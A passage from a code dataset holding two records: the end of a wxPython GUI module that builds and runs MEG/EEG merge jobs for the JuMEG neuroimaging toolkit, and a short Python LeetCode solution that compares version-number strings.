pdfs[\"eeg_index\"][subject_id][idx]\n cmd += \" --meg_stage=\" + pdfs[\"stage\"]\n cmd += \" -fmeg \" + pdfs[\"mne\"][subject_id][idx][\"pdf\"]\n cmd += \" --eeg_stage=\" + pdfs[\"stage\"]\n cmd += \" -feeg \" + pdfs[\"eeg\"][subject_id][eeg_idx][\"pdf\"]\n #cmd += \" \"+ cmd_parameter\n joblist.append( cmd )\n \n if self.verbose:\n wx.LogMessage(jb.pp_list2str(joblist, head=\"MEEG Merger Job list: \"))\n wx.LogMessage(jb.pp_list2str(self.HostCtrl.HOST.GetParameter(),head=\"HOST Parameter\"))\n if joblist:\n # wx.CallAfter(pub.sendMessage,\"SUBPROCESS.RUN.START\",jobs=joblist,host_parameter=self.HostCtrl.HOST.GetParameter(),verbose=self.verbose)\n wx.CallAfter(self.SubProcess.run,jobs=joblist,host_parameter=self.HostCtrl.HOST.GetParameter(),verbose=self.verbose)\n \n def ClickOnCancel(self,evt):\n wx.LogMessage( \"<Cancel> button is no in use\" )\n wx.CallAfter( pub.sendMessage,\"MAIN_FRAME.MSG.INFO\",data=\"<Cancel> button is no in use\")\n\n def ClickOnCtrls(self, evt):\n obj = evt.GetEventObject()\n #print(obj.GetName())\n if obj.GetName() == self.GetName()+\".BT.APPLY\":\n self.ClickOnApply()\n elif obj.GetName() == self.GetName()+\".BT.CLOSE\":\n wx.CallAfter( pub.sendMessage, \"MAIN_FRAME.CLICK_ON_CLOSE\",evt=evt)\n #else:\n # evt.Skip()\n\nclass JuMEG_GUI_MEEGMergeFrame(JuMEG_wxMainFrame):\n def __init__(self,parent,id,title,pos=wx.DefaultPosition,size=[1024,768],**kwargs):\n style = wx.DEFAULT_FRAME_STYLE | wx.NO_FULL_REPAINT_ON_RESIZE\n super().__init__(parent,id, title, pos, size, style,**kwargs)\n self.template_path = None\n\n def update(self,**kwargs):\n return JuMEG_wxMEEGMergerPanel(self,**kwargs)\n \n def UpdateAboutBox(self):\n self.AboutBox.description = \"merging EEG data <*.vhdr> into MEG data <*.fif>\"\n self.AboutBox.version = __version__\n self.AboutBox.copyright = '(C) 2018 Frank Boers <f.boers@fz-juelich.de>'\n self.AboutBox.developer = 'Frank Boers'\n self.AboutBox.docwriter = 'Frank Boers'\n\nif __name__ == '__main__':\n app = wx.App()\n frame = JuMEG_GUI_MEEGMergeFrame(None,-1,'JuMEG MEEG MERGER',module=\"jumeg_preproc_merge_meeg\",function=\"get_args\",ShowLogger=True,ShowCmdButtons=True,ShowParameter=True,debug=True,verbose=True)\n 
app.MainLoop()\n","repo_name":"jdammers/jumeg","sub_path":"jumeg/gui/jumeg_gui_meeg_merger.py","file_name":"jumeg_gui_meeg_merger.py","file_ext":"py","file_size_in_byte":8635,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"} +{"seq_id":"16020790150","text":"class Solution:\n def compareVersion(self, version1: str, version2: str) -> int:\n p1 = p2 = 0\n version1 = version1.split('.')\n version2 = version2.split('.')\n \n # if passed the first while loop, the two versions \n # have the same valued prefix\n while p1 < len(version1) and p2 < len(version2):\n if int(version1[p1]) > int(version2[p2]):\n return 1\n elif int(version1[p1]) < int(version2[p2]):\n return -1\n p1 += 1\n p2 += 1\n \n # edge case: the rest of the longer version is just 0\n while p1 < len(version1):\n if int(version1[p1]) != 0:\n return 1\n p1 += 1\n \n while p2 < len(version2):\n if int(version2[p2]) != 0:\n return -1\n p2 += 1\n \n return 0\n ","repo_name":"radioheado/Leetcode","sub_path":"Python3/165. Compare Version Numbers.py","file_name":"165. Compare Version Numbers.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}